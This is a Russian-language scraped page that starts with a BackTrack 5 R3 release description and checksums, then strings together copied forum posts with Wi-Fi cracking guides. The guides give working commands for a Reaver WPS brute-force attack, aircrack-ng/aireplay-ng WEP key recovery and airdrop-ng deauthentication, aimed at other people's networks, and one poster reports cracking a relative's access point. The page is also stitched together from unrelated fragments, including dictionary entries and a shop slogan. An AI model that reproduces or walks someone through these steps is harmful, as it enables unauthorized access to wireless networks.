Руководства, Инструкции, Бланки

Bt5r3 инструкция img-1

Bt5r3 инструкция

Категория: Инструкции

Описание

BackTrack 5 R3 x86, x64 (4xDVD) GNOME VMware образ i386: Rutracker

BackTrack 5 R3 [x86, x64] (4xDVD) + GNOME VMware образ [i386] Торрент

BackTrack 5 R3 [x86, x64] (4xDVD) + GNOME VMware образ [i386]

Лечение: не требуется

Описание:
Компания Offensive Security объявила о выпуске обновленной версии специализированного дистрибутива BackTrack 5 R3, построенного на базе Linux и предназначенного для исследования безопасности информационных систем.

При подготовке релиза новой платформы разработчики уделили основное внимание исправлению выявленных ошибок в коде программного решения и сделали упор на расширение функциональности и повышение стабильности работы комплекса. В состав дистрибутива BackTrack 5 R3 было включено более 60 новых инструментов, часть из которых были анонсированы в ходе недавних мероприятий по IT-безопасности BlackHat и DefCon 2012. Также был добавлен новый раздел Physical Exploitation, в который вошли такие пакеты, как Arduino IDE и Kautilya Teensy.

Ключевой особенностью BackTrack 5 R3 является внушительная подборка средств программно-технической экспертизы и оценки безопасности вычислительных систем, комплексов и сетевых инфраструктур. Возможности дистрибутива позволяют проводить всестороннее тестирование продуктов на предмет наличия брешей и уязвимостей, выявлять "узкие места" в защите систем и анализировать последствия атак злоумышленников.

В релизе BackTrack 5 R3 сделано множество испарвлений багов, а также добавлено более 60 новых программ, некоторые из которых были представлены на недавних хакерских конференциях BlackHat и Defcon 2012.

Появилась и совершенно новая категория инструментов: «физические эксплойты» (Physical Exploitation), которая включает инструменты вроде Arduino IDE и соответствующих библиотек, а также коллекцию Kautilya Teensy.

Кроме традиционных образов KDE и GNOME, 32/64-бит, в сборке единый образ виртуальной машины VMware (GNOME, 32-бит).

8cd98b693ce542b671edecaed48ab06d BT5R3-GNOME-64.iso
aafff8ff5b71fdb6fccdded49a6541a0 BT5R3-GNOME-32.iso
981b897b7fdf34fb1431ba84fe93249f BT5R3-KDE-64.iso
d324687fb891e695089745d461268576 BT5R3-KDE-32.iso
bca6d3862c661b615a374d7ef61252c5 BT5R3-GNOME-32-VM.zip

Другие статьи

BackTrack - это

BackTrack это:

BackTrack был создан на базе нескольких linux -дистрибутивов. Первоначально предназначался для использования на ОС slackware, а затем плавно перешёл на Ubuntu.

WHAX (название произошло от White Hat и SLAX ) был создан для проведения тестов на проникновения. Изначально базировался на Knoppix и назывался Whoppix. Однако после выхода версии 3, основанной на Slax был переименован в WHAX. Разрабатываемый израильским специалистом по информационной безопасности Мати Ахарони, WHAX делал основной акцент на тесты на проникновение. Дистрибутив делал возможным проверку безопасности с помощью компьютеров, расположенных в различных местах.

Auditor Security Collection

Макс Мозер называл Auditor Security Collection швейцарским ножом для оценки безопасности. Одинаковые цели этого дистрибутива и WHAX в конце концов привели к объединению. Он представлял более 300 инструментов в виде удобных графических меню. Эта дружелюбность к пользователю перекочевала и в BackTrack. Auditor Security Collection представлял собой liveCD. на базе knoppix.

Текущее состояние

После того, как дистрибутив начал стабильно развиваться и была налажена работа обратной связи с пользователями, производители сделали упор на расширение стабильности и функциональности, что изменило процесс разработки. В текущих версиях BackTrack большинство программ использованы в виде отдельных модулей, что упрощает процесс создания дополнений и исправлений.

Дистрибутив создан для тестировщиков информационной безопасности. Поставляется в виде LiveUSB и liveCD. от пользователя требуется только загрузиться с носителя содержащего BackTrack. Также есть возможность установки системы на жёсткий диск (требуется примерно 2,7 ГБ). В настоящее время в дистрибутив включены инструменты для программно-технической экспертизы. Также ведётся работа над поддержкой иероглифических азиатских языков.

Примечание. последние версии BackTrack поставляются в виде ISO-образа и образа для VMWare. В специальных версиях для LiveUSB более нет необходимости, т.к. теперь установку на флешку легко произвести с помощью утилит типа Unetbootin или вручную (см. руководство ). При использовании BackTrack на виртуальной машине нужно учитывать, что любое ПО для виртуализации может работать только с подключаемыми по USB беспроводными адаптерами как с физическими (реальными) устройствами.

Наиболее известные программы в пакете

Для удобства доступа к инструментам они разделены на 16 категорий

Так же в состав дистрибутива включены привычные для пользователей программы Mozilla Firefox. Pidgin. K3b. и XMMS .

Релиз-версии

Релиз BackTrack 2 был выпущен 6 марта 2007 года и включал в себя около 300 инструментов для проверки безопасности .

Бета-версия BackTrack 3 была выпущена 14 декабря 2007 года. Основной акцент в ней был сделан на поддержку большего количества оборудования и большую гибкость конфигурирования.

Релиз BackTrack 3 был выпущен 19 июня 2008 года. Туда был включён Saint, однако был убран Nessus. Версией ядра осталась 2.6.21.5.

Бета-версия BackTrack 4 была выпущена 11 февраля 2009 года. Здесь произошли наиболее значительные изменения за всю историю: дистрибутив стал базироваться на Debian

Смотреть что такое "BackTrack" в других словарях:

BackTrack — Basisdaten Entwickler Max Moser, Mati Aharoni, Martin J. Muench … Deutsch Wikipedia

BackTrack — Famille Distribution GNU/Linux Etat du projet en developpement Entreprise / Developpeur Remote Exploit / Mati Aharoni, Max Moser Etats des sources Logiciel libre et Open Source Derniere version stable … Wikipedia en Francais

Backtrack — BackTrack 3.0 Famille Distribution Linux Etat du projet en developpement … Wikipedia en Francais

Backtrack — may refer to:* Back Track, a first person shooter for the Game Boy Advance * BackTrack, a Linux distribution * Backtrack (1990 film), alternative name to Catchfire. a 1990 drama film * Backtrack (western novel), a 1965 western novel written by… … Wikipedia

backtrack — index retreat, withdraw Burton s Legal Thesaurus. William C. Burton. 2006 … Law dictionary

backtrack — (v.) retrace one s steps, figuratively, by 1896, from literal sense, with reference to hunted foxes, from BACK (Cf. back) (adv.) + TRACK (Cf. track) (v.). Related: Backtracked; backtracking … Etymology dictionary

backtrack — To deliver mail to a point that the letter carrier has mistakenly bypassed … Glossary of postal terms

backtrack — > VERB 1) retrace one s steps. 2) reverse one s previous position or opinion … English terms dictionary

backtrack — ? backtrack [bak?trak? ] vi. 1. to return by the same path 2. to withdraw from a position, attitude, etc … English World dictionary

Моряки Одессы - лучшие товары для моряков!

Основное использование
Убедитесь,
что ваша wifi-карта переведена в режим “монитора” (monitor mode):

airmon-ng start wlan0

Для запуска
Reaver, необходимо указать BSSID целевой АР и имя интерфейса, который находится
в режиме “монитора” (обычно “mon0?, а не “wlan0?, хотя это будет зависеть
от типа беспроводной карты/драйверов):

reaver -i mon0 -b 00:01:02:03:04:05

Для
получения более подробной информации используйте -vv:

reaver -i mon0 -b 00:01:02:03:04:05 -vv

Канал и SSID
(при условии, что SSID не скрыта) атакуемой АР автоматически определяются
Reaver’ом. Но их можно явно указать в команде:

reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys

По
умолчанию, если АР переключает каналы (switches channels), reaver тоже будет
это делать. Тем не менее, эта опция будет отключена, если явно указать канал
АР:

reaver -i mon0 -b 00:01:02:03:04:05 --fixed

Увеличение скорости атаки
По умолчанию
период получения тайм-аута (timeout) равен 5 секундам. Но период тайм-аута
(timeout) можно уставить вручную (минимальный срок ожидания = 1 сек.):

reaver -i mon0 -b 00:01:02:03:04:05 -t 2

По
умолчанию, перед отсылкой очередного pin’a AP, reaver производит задержку,
которая равна 1 секунде. Эту задержку можно отключить, воспользовавшись опцией -d0. Однако некоторым АР будет все равно, но попробовать все таки стоит:

reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Другой
вариант, который может ускорить атаку, опция –dh-small. Опция “говорит”
raever’y использовать не большие секретные/скрытые номера Диффи-Хеллмана в
целях снижения вычислительной нагрузки на целевую AP:

reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

Некоторые
АР, при обнаружении подозрительной активности, будут блокировать WPS на 5 минут
или меньше. По умолчанию, когда WPS заблокирована, reaver будет проводить
проверку состояния WPS на АР, которая составляет 315 секунд (5 минут и 15
секунд). Следовательно перебор пинов будет приостановлен. Эту проверку можно
увеличить/уменьшить на любое не отрицательное число:

reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250

По умолчанию
период получения M5 и M7 сообщений от WPS составляет 0.1 сек. Если необходимо,
период получения этих сообщений можно указать вручную (максимальный период
равен 1 секунде):

reaver -i mon0 -b 00:01:02:03:04:05 -T .5

Большинству
АР не нужно, но иногда необходимо, посылать EAP FAIL сообщения для
закрытия WPS сессии. По умолчанию эта опция выключена, однако ее можно включить
след. командой:

reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate

Когда WPS
получает последовательно 10 “неожиданных” ошибок, то появляются предупреждающие
сообщения. Это может быть признаком того, что АР ограничена по скорости
перебора pin-кодов или она просто перегружена. Таким образом можно указать
reaver’у, чтобы он перешел в сонный режим, если эти ошибки будут появляться:

reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

Как ещё подробнее рассказать я просто не знаю!
Взлом может идти быстро может медленно зависит от того как настроен маршрутизатор!

Сообщение отредактировал STALKER - Четверг, 30.05.2013, 16:42

Попросил треху, взять в виледже в Джебел Али. На залипуху не похоже. В конце точно В. Скачал дрова последние с оф сайта. Вроде пошло, но как то слабенько. Вот кручу, верчу эту коробку и ни слова про 1000 или 500 мВт я тут не вижу. Похоже товарищ выше прав и это полуватка. А по виду она ни чем не отличается от той что на этом же сайте слева на картинке. Такая же цифра 1 и на моей.
Эхххх, хочешь сделать что то как следут - купи это сам.

Привет всем. Пишу с первой сломаной wep точки. Ломал точку своего племянника. Заняло примерно 8-9 минут. Бени понадобилось 12 000 пекетов. Все делал по инструкции от Сталкера, за ,что ему еще раз огромное спасибо. Кто этим мается смотрите внимательно что бы значек уровня сигнала в винде был перечеркнут красным крестом( полностью отключен встроеный вайфай).А на вирт машине реалтек был законектен. В общем все как по инструкции.Вопрос-Скачал образ BT-5 R3-BH он весит 2.6 Гига это так и должно быть? И второе Когда добавлять эту прогу нужно создавать новую вирт машину или ее можно добавить туда где беня? Спасибо всем. К стати при взломе RQX было 22-40 Сломаный пороль был (1212121212)

Статья Взлом WI-Fi с помощью BackTrack 5 R1 Linux

Репутация: -1 / 0

Взлом WI-Fi с помощью BackTrack 5 R1 Linux

Нам необходимо:
- Дистрибутив BT 3/4/5 (USB, CD - не имеет значения)
- Адаптер, поддерживающий переход в режим монитора и пакетные инъекции. Cписок
- Словарь для подбора. Можно посмотреть тут и тут.
Какой беспроводной адаптер нужен для взлома?
Перед тем, как экспериментировать, нужно убедиться, что беспроводной адаптер может работать в режиме мониторинга. Лучший способ — свериться со списком поддерживаемого оборудования на сайте проекта Aircrack-ng (bit.ly/wifi_adapter_list). Если же встанет вопрос о том, какой беспроводный модуль купить, то начать можно с любого адаптера на чипсете RTL8187L. USB’шные донглы легко найти в интернете за $20.

1) смотрим какой у вас беспроводной интерфейс пишем:

Отобразиться список всех доступных WiFi адаптеров.
Выберите адаптер, который будете использовать.
В моем случае это wlan0 (Realtek RTL8187L ).


2. Переводим адаптер в режим монитора

Наберите в консоли:

airmon-ng start [имя вашего адаптера]тоисть wlan0 или то что у вас там будет

2) airodump-ng wlan0 Запускаем мониторинг список сетей, выбираем мак сети и канал который будем ломать
определиться с выбором можна просто смотрим какой сигнал сильнее логично. ето дело можна записывать но я
просто командой выдиляем ето окно и жмем Ctrl+c - останавливает процес мониторинга. после выбора канала
останавливаем все окна командой Ctrl+c и делаем такое
airmon-ng stop mon0
airmon-ng stop wlan0 (внимание ето мой интерфейс у вас он может быть другим я выше писал)
airmon-ng start wlan0 и канал сети которую будем ломать выглядит ето так
airmon-ng start wlan0 9 - пример.

3) macchanger wlan0 смотрим свой мак адрес, визде по разному работает если у вас их 2 то первый ваш.
В линуксе есть по стандарту 2 десктопа первые три выше указаных команды проделываем в одном десктопе
а все остальное открываем 2 десктоп и проделываем все остальное ниже указаное ето для вашего удобства.

4) airodump-ng -c канал сети -w задайте любое имя файлу(capture ето мое имя файла ) --bssid мак сети которую ломаем wlan0 запускаем монитор сети нажатием Enter
в етом окне будет мак ломаемой сети. И будут собираться пакеты. (в виде DATA все другое нас не интересует только пакетики DATA)

Пятая команда выполняеться в одном окне если все прошло нормально после пыполнения команд вы увидите
англ текст и вот такое вот :-)
5) 1. aireplay-ng -1 0 -a(мак сети которую ломаем)wlan0

2. aireplay-ng -3 -b (мак сети которую ломаем)-h (ваш мак) wlan0

6) aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y
можно увеличить число отправки пакетов для етого перед -2 ставим значение -x и ставим число от 1 до 1024 помоему ) ну оптимально помоему 300 ето существенно увеличит скорость сбора пакетов )

7) Набираем aircrack-ng ваш файл-01.cap ето уже в новой консоли
Ну вот и конец всему при наборе етой команды програма начнет переберать собраные пакеты их нада от 30 000
до 2000000 и больше (пока не найдет ключик ) восновном весь процес в среднем занимает 15- 60 минут ,
если у вас не удалось запустить -4 -5 и -1 не растраивайтесь продолжайте собирать пакеты они форматом (.cap)
сохраняються на ваш рабочий стол.

8) и ещераз повторюсь в новой консоли пишем aircrack-ng (имя вашего файла ) вот оно ---> ну типа у вас будет то которое задали при команде 4)capture*.cap ето для тех кто непонял №7)

Если пишет что KEY FOUND! decrypted 100% Код будет в виде типа 12:48:78:F1. можно записать етото тока нада будет удалять. между цифр а можно записать код типа (ASCII Тут код будет ) допустим (ASCII:MERCEDES) уже такой какой он есть насамом деле написан на наклейке модема. разниц. нет примет что тот что тот код.
- вы нашли пароль. если в пароле будут все нули ето не верный пароль, продолжайте
собирать пакеты до тех пор пока не найдете пароль. взлом только шифрование wep

Я думаю у вас получиться . ВИДЕО. [►]

Кому просто нада запустить интернет подключение к ( Wi-Fi на виртуальной машинке иногда такой как virtualbox ) или ADSL подключение пишем в консоли следующую строчку

Как пользоваться AIRDROP-NG

Airdrop-ng написан на Python и требует для работы установленный airodump-ng и библиотеку Lorcon 1. Но если использовать Backtrack, то все необходимое и сама утилита без проблем установится из стандартного репозитория:

apt-get update
apt-get install airdrop-ng

Схема использования мало чем отличается от знакомых нам атак:

1) Первым делом надо перевести Wi-Fi-карту в режим мониторинга:

airmon-ng start wlan0

2) Далее запустить беспроводный сниффер airodump, сконфигурировав его вывод в .csv-файл:

airodump-ng -w dumpfile --output-format csv mon0

3) После этого создаем файл с правилами для AirDrop. Возьмем для примера описанное выше правило, запрещающее соединения с AP, у которой mac = 00-11-22-3344-55, и запишем его в файл rules:

nano rules
d/00-11-22-33-44-55|any

4) Все, осталось запустить сам airdrop-ng, прилинковавшись к csv-выводу сниффера и конфигу с правилами:

airdrop-ng -i mon0 -t dumpfile.csv -r rules

Утилита начнет свою работу, выводя сообщения об отправленных в сеть пакетах. Если помимо прочего указать ключ "-b", дополнительно будет выводиться подробный отчет. В результате на консоль будут выводиться сообщения, каким клиентам и где было разрешено или запрещено соединение. Как я уже сказал, условия могут быть намного более гибкими, это достигается с помощью каскада правил:

#Allow-правило
a/00-11-22-33-44-55|55-44-33-22-11-00
#Deny-правило
d/00-11-22-33-44-55|any

Таким образом, мы разрешаем доступ к точке клиенту с MAC-адресом 55-44-33-22-11-00, в то время как для всех остальных соединение по-прежнему останется недоступным. Получается, Airdrop-ng можно использовать как простейшую систему контроля доступа . И это без какоголибо доступа к админке точки!


софт можна скачать
отсюда Backtrack 5
для монтирования на флешку берем прогу отсюда Unetbootin

Статюспер с античат зачем писать то что уже написано до меня ) но просто коечто упростил и подогнал под Backtrack 4-5 так как будет менше вводить текста )

Кому нужна помощь Пишите в Коментариях буду рад помочь ) Извените за ишибки руского я неочень знаю ) Но помойму всем будет понятно )

Последний раз редактировалось Dovbnyak; 25.12.2011 в 16:28. Причина: Добавляю стати по Backtrack )

Приветствую.Статейка познавательная.Я тут столкнулся за это время с рядом вопросов.Половину конечно уже решил, но остальные остались.

1)У меня Back Track 5 R1 не могу на нем создать высокоскоростное ADSL подключение. Есть только подключение к WI-FI,но меня это почему-то не радует=)
Как подключить интернет?

2)Есть какие-нибудь другие способы по взлому Wi-Fi? Просто это бесполезное занятие, брутить.Я поставил брут на ночь и не чего не нашел.Потом 2-й ночью тоже самое.=( Это хорошо если пасс есть в словаре, а если его там нет?
Короче это ЛАЖА. ИМХО.
У меня словарей не мерено и 11Gb и по 5Gb а толку от них нет.
(кстати, а почему я не могу запустить сразу 11Gb словарь - вроде пишет не хватает пакетов, потом дожидаюсь и. даже с перебором в пару тысяч. а только ноль!Пишет новое количество пакетов и не брутит.

- Я слышал можно как-то (хайндхешник) можно молануть быстро через pyrit.Это тоже словарь нужен?

Заранее спасибо за ответ.

__________________
Если у тебя есть МОЗГ!?То его нужно развивать,а не тормозить по жизни.

Эх, если бы ты сам это написал. А так я уже на ачате и прочел.
Про wep непонятно написано, есть и лучше статьи.
У меня, кстати, airolib-ng не работает. Все время выдает справку по параметрам и ничего более не делает (Backtrack 5)

xam
1)Пропиши в терминале

Если подключение исправно, все будет работать. Но вписывать это надо каждый раз после включения.
2)wpa и wpa2 только брутить. В wep есть уязвимость, ломается за 5 минут. Статей много написано.

__________________
[SIGPIC][/SIGPIC]
__________________________________________________
[FONT="Comic Sans MS"][COLOR="DarkRed"][B]

icq: [B]5[/B][B]9[/B][B]7[/B][B]4[/B][B]5[/B][B]0[/B][B]1[/B][B]9[/B][B]7[/B] skype: psibooox (проверяется редко)

[/B][/COLOR]
[B]Sanguine, My Brother![/B]
Уехал. В сети редко.[/FONT]

Эх, если бы ты сам это написал. А так я уже на ачате и прочел.
Про wep непонятно написано, есть и лучше статьи.
У меня, кстати, airolib-ng не работает. Все время выдает справку по параметрам и ничего более не делает (Backtrack 5)

xam
1)Пропиши в терминале

Если подключение исправно, все будет работать. Но вписывать это надо каждый раз после включения.
2)wpa и wpa2 только брутить. В wep есть уязвимость, ломается за 5 минут. Статей много написано.


Что тут непонятного. Тут проще простого и темболее на античате там столько старя что уже половина на Backtrack неработает и темболее используется дохрена команд для НОВИЧков оч сложно их будет понять.

НЕВЕРИШ ЧТО Я САМ НАПИСАЛ. ЯЖЕ НАПИСАЛ СПЕР С АНТИЧАТА НО СТРОЧКИ ПЕРЕДЕЛАЛ САМ.

Ты точно прочитал мой пост?

Где я пытаюсь доказать обратное? Я имел в виду то, что если бы ты написал аналогичную статью сам, было бы гораздо лучше.

Здесь я имел в виду то, что мне не нравится манера изложения автора и непоследовательность его мыслей, которая усложняет восприятие смысла статьи.

Ложь. Ты сам-то знаешь, чем отличаются версии Backtrack?
Все описываемые в статье средства остались прежними, изменились только версии. Но это никоим образом не сказалось на синтаксисе команд для их запуска.
Только что испробовал на Backtrack 3,4,5. Результат один и тот же.

Постарайся сам более грамотно писать. Чтобы понять эти три предложения, мне пришлось перечитать их 4 раза. Неужели так трудно расставить хотя бы запятые?

Я не писал статю для споров и доказательств кто больше знает и больше может хочеш флудить или в другой топик.

Я не писал статю для споров и доказательств кто больше знает и больше может хочеш флудить или в другой топик.

Не тебе тут указывать, куда мне идти и что мне делать.
Флуда тут с моей стороны не было - я всего-навсего давал свои комментарии и отвечал на возникшие вопросы.

Я описал мои впечатления от статьи.
Это была здоровая критика, которую ты почему-то не воспринял, а встретил в штыки. Возможно, что тут проблема в тебе, не правда ли? Надо быть проще и прислушиваться к советам хотя бы иногда.

И так тоже пробовал. (Полный 0!)
В настройках нет нечего подобного. что напоминает подключение к интернету.
Нет ни DSL ни Мобильного широкополосного соединения.

Тогда я без понятия. У меня работало. Попробуй отписать на официальном форуме или документацию почитать. Там правда на английском все, но это не проблема, я думаю.

__________________
[SIGPIC][/SIGPIC]
__________________________________________________
[FONT="Comic Sans MS"][COLOR="DarkRed"][B]

icq: [B]5[/B][B]9[/B][B]7[/B][B]4[/B][B]5[/B][B]0[/B][B]1[/B][B]9[/B][B]7[/B] skype: psibooox (проверяется редко)

[/B][/COLOR]
[B]Sanguine, My Brother![/B]
Уехал. В сети редко.[/FONT]

Взлом WiFi - BackTrack 5 R3 - WPS

Обсуждения

Существует множество программ для взлом WiFi. но сегодня мы поговорим о BackTrack 5 R3

Вам не нужно быть администратором сети, чтобы воспользоваться Reaver и инструментами командной строки, которые делают тяжелую работу, и если Вы имеете чистый DVD, компьютер с картой Wi-Fi и несколько свободных часов, то у Вас есть практически все, что нужно. Есть целый ряд способов, с помощью которых Вы могли бы установить Reaver, но есть конкретные требования данного руководства:

BackTrack 5 Live DVD. BackTrack представляет собой загрузочный дистрибутив, который наполнен до краев инструментами тестирования сети, но, хотя это не строго обязательно для использования Reaver, это самый простой подход для большинства пользователей. Скачайте Live DVD со страницы загрузки BackTrack и запишите его на DVD. Вы можете также загрузить образ виртуальной машины, если используете VMware, но если Вы не знаете, что такое VMware, просто остановитесь на Live DVD. Показанное выше означает, что Вы должны выбрать BackTrack 5 R1 в списке выпусков, выбрать Gnome, 32 – или 64-битный, в зависимости от Вашего процессора (если не знаете, какой у Вас, то безопаснее выбрать 32), ISO для образа, а затем загрузить ISO.
Компьютер с Wi-Fi и привод DVD. BackTrack работает с беспроводной картой на большинстве ноутбуков, поэтому вероятно, что ноутбук будет работать нормально. Тем не менее, BackTrack имеет не полный список совместимости, а поэтому никаких гарантий. Вам также понадобится дисковод DVD, поскольку из него Вы будете загружаться в BackTrack.
Размещена недалеко Wi-Fi сеть с WPA-защитой. Технически, это должна быть сеть с использованием WPA-защиты и включенная WPS. Автор объясняет подробнее в разделе “Как работает Reaver”, как WPS создает брешь в системе безопасности, что делает возможным взлом WPA.
Немного терпения. Это 4-х ступенчатый процесс и хотя не очень сложно взломать пароль WPA с Reaver, но это атака грубой силы, которая означает, что Ваш компьютер будет проверять много разных комбинаций для взлома маршрутизатора, прежде чем найдет правильную. Когда тестировал автор, то Reaver понадобилось около 2,5 часов, чтобы успешно взломать пароль. Домашняя страница Reaver предполагает, что это может занять 4-10 часов. Ваша оценка может измениться.

Шаг 1: Загрузка BackTrack

Как взломать пароль WPA сети Wi-Fi с помощью Reaver Чтобы загрузиться с BackTrack, просто вставьте DVD в дисковод и загрузите машину с диска. (Используйте Google, если вы ничего не знаете о дисках Live CD/DVD и Вам нужна помощь в этой части.) Во время процесса загрузки BackTrack Вам будет предложено выбрать режим загрузки. Выберите “BackTrack Text – Default Boot Text Mode” и нажмите Enter.

Наконец, BackTrack загружается в командной строке. Когда Вы увидите в строке курсор, введите команду startx и нажмите Enter. BackTrack будет загружен в своем графическом интерфейсе.

Шаг 2: Установка Reaver

В командной строке введите:

Затем, после завершения обновления:

apt-get install reaver

Как взломать пароль WPA сети Wi-Fi с помощью ReaverЕсли все прошло хорошо, то теперь Reaver должен быть установлен. Это может казаться немного хромым, но Вам было необходимо подключение к сети, чтобы установить Reaver, но теперь он будет оставаться установленным, пока Вы не перезагрузите компьютер.

Шаг 3: Соберите информацию об устройстве, подготовьте Ваш взлом

Для того, чтобы использовать Reaver, Вам необходимо получить имя интерфейса беспроводной карты, BSSID маршрутизатора, который Вы пытаетесь сломать (BSSID – это уникальная последовательность букв и цифр, который идентифицирует маршрутизатор), и Вы должны убедиться, что Ваша карта беспроводной сети находится в режиме мониторинга. Давайте все это сделаем.

Найдите Вашу беспроводную карту: Внутри Terminal, введите:

Как взломать пароль WPA сети Wi-Fi с помощью ReaverНажмите клавишу Enter. Вы должны увидеть мобильное устройство в дальнейшем список. Скорее всего, это будет имя wlan0, но если у Вас есть несколько беспроводных карт или необычные сетевые настройки, то название может быть другое.

Переведите Вашу беспроводную карту в режим мониторинга: Предположим, что имя интерфейса Вашей беспроводной карты есть wlan0, тогда выполните следующую команду, чтобы перевести беспроводную карту в режим мониторинга:

airmon-ng start wlan0

Эта команда выведет имя интерфейса режима мониторинга, которое Вы также должны знать. Скорее всего, это будет mon0, как показано на рисунке ниже. Обратите на это внимание.

Как взломать пароль WPA сети Wi-Fi с помощью ReaverНайдите BSSID маршрутизатора, который Вы хотите взломать: Наконец, Вам необходимо получить уникальный идентификатор маршрутизатора, который Вы пытаетесь взломать, чтобы Вы могли указать Reaver правильное направление. Для этого выполните следующую команду:

Вы увидите список беспроводных сетей вокруг Вас – это выглядит как на скриншоте ниже:

Как взломать пароль WPA сети Wi-Fi с помощью ReaverКогда увидите необходимую сеть – нажмите Ctrl + C, чтобы остановить обновление списка и скопируйте BSSID данной сети (это последовательность букв, цифр и двоеточий в крайнем левом столбце). Сеть должны иметь WPA или WPA2, перечисленные в колонке ENC. (Если это WEP, то используйте предыдущее руководство по взлому WEP паролей).

Теперь, с BSSID и именем интерфейса монитора в руках у Вас есть все необходимое для запуска Reaver.